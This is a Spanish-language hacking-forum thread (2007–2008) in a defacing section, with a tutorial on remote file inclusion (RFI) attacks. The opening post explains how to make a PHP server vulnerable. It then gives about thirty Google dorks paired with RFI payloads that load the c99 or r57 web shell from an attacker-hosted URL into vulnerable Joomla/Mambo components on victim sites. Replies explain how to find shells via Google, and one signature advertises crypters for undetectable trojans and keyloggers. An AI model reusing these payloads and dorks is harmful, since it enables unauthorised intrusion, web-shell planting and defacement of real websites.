Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Julio 19, 2008, 09:10:34
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Video tutorial RFI r57 & Deface by Socket_0x03 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Video tutorial RFI r57 & Deface by Socket_0x03  (Leído 1137 veces)
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 79



Ver Perfil Email
« en: Octubre 26, 2007, 01:25:36 »
Posiblemente las técnicas del RFI ya han sido posteadas en este foro, sin embargo, voy a agregar
algunos datos más el video, de forma que no solamente se vera la teoría sino también la practica.
En el video también se podrá apreciar algunos de los funcionamientos de la shell r57.


-------------------------------------------------------------------------------
-------------------PONIENDO TU PC VULNERABLE A RFI--------------------------
-------------------------------------------------------------------------------

-Desde el servidor que vamos a poner vulnerable:
1. En el php.ini de tu servidor web ve que tengas activas (en On) estas funciones:
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = On
Si no las tienes en On, ponlas y reinicias la computadora para que los cambios
surjan efecto.

2. Crea un archivo de nombre index.php y le colocas el siguiente código:
<?php
include($_GET['page']); //esto incluye cualquier link que se especifique en page
?>

3. Crea un archivo de nombre archivo.htm y le colocas el siguiente código:
<center>
<b>Hola Mundo</b>
</center>

4. Coloca este link:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion y veras el mensaje "Hola mundo"

5. Coloca este link:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion y veras la web de google

-Desde el servidor del atacante:

1. Colocar este link:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
   y veras la shell r57.txt


-----------------------------------------------------------------------------
------------------------------ATAQUES--------------------------------------
-----------------------------------------------------------------------------


------------------------RFI en include page----------------------------------

Como tu eres el atacante, coloca la shell c99.txt o r57.txt en tu servidor
web (ej: IIS, Apache...), de forma que quede así:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.tuweb.com/c99.txt

2. Para buscar una victima ve a google y teclea: allinurl:index.php?page=
3. Una vez que seleccionas la web borra todo hasta el ultimo / y le colocas
la siguiente línea: index.php?page=http://www.tuweb.net/c99.txt de forma
que te quedaría asi:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.victima.com/index.php?page=http://www.tuweb.com/c99.txt


más ataques:

en google colocar: powered : war v1.5.0
RFI: admin/admin.php?vwar_root=http://www.tuweb.com/c99.txt

en google colocar: powered by Eqdkp 1.3.0
RFI: /includes/dbal.php?eqdkp_root_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_htmlarea3_xtd-c"
RFI: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_sitemap"
RFI: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_pccookbook"
RFI: components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:index.php?option=com_extcalendar
RFI: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_forum"
RFI: /components/com_forum/download.php?phpbb_root_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_performs"
RFI: components/com_performs/performs.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_comprofiler"
RFI: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_zoom"
RFI: /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_serverstat"
RFI: /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"minibb"
RFI: components/minibb/index.php?absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_fm"
RFI: components/com_fm/fm.install.php?lm_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_flyspray"
RFI: /components/com_flyspray/startdown.php?file=http://www.tuweb.com/c99.txt

en google colocar: inurl:index.php?option=com_simpleboard
RFI: /components/com_simpleboard/file_upload.php?sbp=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_hashcash"
RFI: /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_smf"
RFI: /components/com_smf/smf.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_pollxt"
RFI: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_loudmounth"
RFI: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_artlinks"
RFI: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_galleria"
RFI: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_akocomment"
RFI: /akocomments.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_videodb"
RFI: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_securityimages"
RFI: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_admin"
RFI: administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:index.php?option=com_pcchess
RFI: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_multibanners"
RFI: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_a6mambohelpdesk"
RFI: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_colophon"
RFI: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_mgm"
RFI: administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_mambatstaff"
RFI: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_kochsuite"
RFI: /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

Notas:
-Si no tienes una web con el c99.txt o r57.txt puedes usar la web de otra
persona que tenga esa shell.
-Si tienes una shell como c99.txt o r57.txt y quieres ver como se ve desde tu
servidor, guárdalo  como c99.php y lo ejecutas desde
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.tuweb.com/c99.php




Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Video RFI r57 & Deface
« Última modificación: Octubre 28, 2007, 01:35:26 por Socket_0x03 » En línea
j4ps0n
Habitual
*****
Desconectado Desconectado

Mensajes: 167



Ver Perfil
« Respuesta #1 en: Octubre 26, 2007, 06:29:45 »
Muchas gracias Socket_0x03 , tan buena info como tus otros videotutoriales Wink

Salu2
En línea

¿Quieres tener un troyano o keylogger 100%  Indetectable?
Es muy fácil usando un Crypter Privado.  Indetectable a todos los antivirus con un solo click.
Mándame un PM si estás interesado o quieres más info.
Dr.SysCrack
Colaborador
*****
Desconectado Desconectado

Mensajes: 406


:Nacer para aprender:.-:.Morir para sobrevivir:.


Ver Perfil
« Respuesta #2 en: Octubre 27, 2007, 01:20:28 »
Men donde esta la pagina de para descargar el video tuto para poder aprenderlo mejor esa tactica y eres muy bueno haciendo video tutos debireas de hacer mas jeje

salu2
En línea


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
En donde dice LeVel23 da click y entra a un nuevo mundo de Hacking donde encontraras muchas cosas para trojanos keloger etc..
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 79



Ver Perfil Email
« Respuesta #3 en: Octubre 27, 2007, 05:43:34 »
Buenas... Dr.SysCrack y bienvenido al foro =D

Les agradezco humildemente sus comentarios... Los videos siempre los coloco al final de cada información... xD

Siempre trato de hacer mis guias en forma de videos tutoriales ya que pienso que una de las mejores formas de enseñar es a través de ejemplos en donde se muestre el procedimiento y sus efectos, algo similar a llevarlo a la practica.

Un salu2 xD
« Última modificación: Octubre 27, 2007, 05:47:50 por Socket_0x03 » En línea
ActiveSheet
Recien Llegado
*
Desconectado Desconectado

Mensajes: 7


Ver Perfil Email
« Respuesta #4 en: Noviembre 03, 2007, 02:00:15 »
lo que yo me pregunto, que rayos es esto?


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

y que significa esto?

 C0d3d By The_BeKiR & TiT & Ruslan por que no dice by Socket_0x03 ?

que cosas tan extrañas no te parese?
« Última modificación: Noviembre 03, 2007, 02:15:16 por ActiveSheet » En línea
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 79



Ver Perfil Email
« Respuesta #5 en: Noviembre 03, 2007, 06:54:17 »
Cita de: ActiveSheet en Noviembre 03, 2007, 02:00:15
lo que yo me pregunto, que rayos es esto?


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

y que significa esto?

 C0d3d By The_BeKiR & TiT & Ruslan por que no dice by Socket_0x03 ?

que cosas tan extrañas no te parese?

Pues en realidad yo lo veo en blanco, por ningun lado veo que diga "C0d3d By The_BeKiR & TiT & Ruslan"
« Última modificación: Noviembre 03, 2007, 08:06:09 por Socket_0x03 » En línea
ActiveSheet
Recien Llegado
*
Desconectado Desconectado

Mensajes: 7


Ver Perfil Email
« Respuesta #6 en: Noviembre 03, 2007, 10:45:10 »
varas, si vez la pagina an blanco, si tienes mozilla presiona Ctrl+U o menu ver codigo fuente.

no dice nada por que esta en html con codigo de php y lo detecta como comentario.

y lo que te digo que viene con eso de "C0d3d By The_BeKiR & TiT & Ruslan"

esta en el archivo

heykir.txt

es un codigo echo en php pero esta loco por que asta tiene graficas echas con java  con el signo de turkia

bastante raro no?
En línea
vef
Recien Llegado
*
Desconectado Desconectado

Mensajes: 7


Ver Perfil
« Respuesta #7 en: Noviembre 07, 2007, 02:02:25 »
Y como creo un servidor web?? probe con el apache pero me daba errores :S

se puede acer desde algun servidor como gratisweb o algo asi?
« Última modificación: Noviembre 07, 2007, 02:04:39 por vef » En línea
Lusa2
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5


Ver Perfil
« Respuesta #8 en: Diciembre 11, 2007, 02:36:25 »
Ami concretamente lo que me pasa esque las opciones k hay k marcar al principio nose como se configuran en mi server de iespana.es.

Me aliviaria muxo 1 respuesta

salu2
En línea
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 79



Ver Perfil Email
« Respuesta #9 en: Diciembre 11, 2007, 05:14:23 »
Citar
varas, si vez la pagina an blanco, si tienes mozilla presiona Ctrl+U o menu ver codigo fuente.

no dice nada por que esta en html con codigo de php y lo detecta como comentario.

y lo que te digo que viene con eso de "C0d3d By The_BeKiR & TiT & Ruslan"

esta en el archivo

heykir.txt

es un codigo echo en php pero esta loco por que asta tiene graficas echas con java  con el signo de turkia

bastante raro no?

Es una shell como cualquier otra, así como la r57 o c99... Solo que el código fue hecho por esas personas (The_BeKiR & TiT & Ruslan).

Citar
Y como creo un servidor web??


Con algun servidor HTTP como Apache o IIS.

Citar
se puede acer desde algun servidor como gratisweb o algo asi?

Generalmente los servicios gratuitos para alojar paginas webs no dan permiso a este tipo de procedimientos, sin embargo esto va a depender de las configuraciones que tenga cada administrador en su servidor, lo ideal seria que montaras tu propio servidor HTTP y realizaras dichas configuraciones.

Citar
Ami concretamente lo que me pasa esque las opciones k hay k marcar al principio nose como se configuran en mi server de iespana.es.

Me aliviaria muxo 1 respuesta

salu2

iespana.es es un servidor para alojamientos de paginas webs, los usuarios registrados solo tienen acceso a las configuraciones relacionadas con las webs que quieran alojar, mas no a las modificaciones internas del servidor (php.ini). El tipo de configuraciones que explique anteriormente son para administradores que tienen su computadora como servidor HTTP, en otras palabras, tendrías que colocar tu computadora como servidor HTTP, tenerlo configurado para PHP y de esta forma realizar las configuraciones para el php.ini.

Un salu2 xD
« Última modificación: Diciembre 11, 2007, 05:47:05 por Socket_0x03 » En línea
Lusa2
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5


Ver Perfil
« Respuesta #10 en: Diciembre 11, 2007, 05:47:34 »
Mm....mejor me voy buscando alguien k ya las tenga subidas....xD

salu2
En línea
Carlmycol
Recien Llegado
*
Desconectado Desconectado

Mensajes: 2


Ver Perfil Email
« Respuesta #11 en: Marzo 11, 2008, 12:35:41 »
Muy bien pero coo se consiguen las sheels¿?
En línea
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 79



Ver Perfil Email
« Respuesta #12 en: Marzo 11, 2008, 02:13:47 »
Cita de: Carlmycol en Marzo 11, 2008, 12:35:41
Muy bien pero coo se consiguen las sheels¿?

Buenas... Carlmycol.

Google es uno de los mejores buscadores para encontrar shells... Si por ejemplo estas buscando la shell c99 vas a google y tecleas "allinurl: c99.txt" si estas buscando la r57 tecleas "allinurl: r57.txt" y de esta forma podras encontrar muchas...

Un salu2 xD
En línea
Th3 ziX™
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1944


El Codigo es la Clave Ing. Inversa


Ver Perfil
« Respuesta #13 en: Marzo 11, 2008, 03:19:10 »
Cita de: Carlmycol en Marzo 11, 2008, 12:35:41
Muy bien pero coo se consiguen las sheels¿?


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Saludoz! Wink
En línea

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Galeria de Diseño de ziX
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Video tutorial RFI r57 & Deface by Socket_0x03 « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC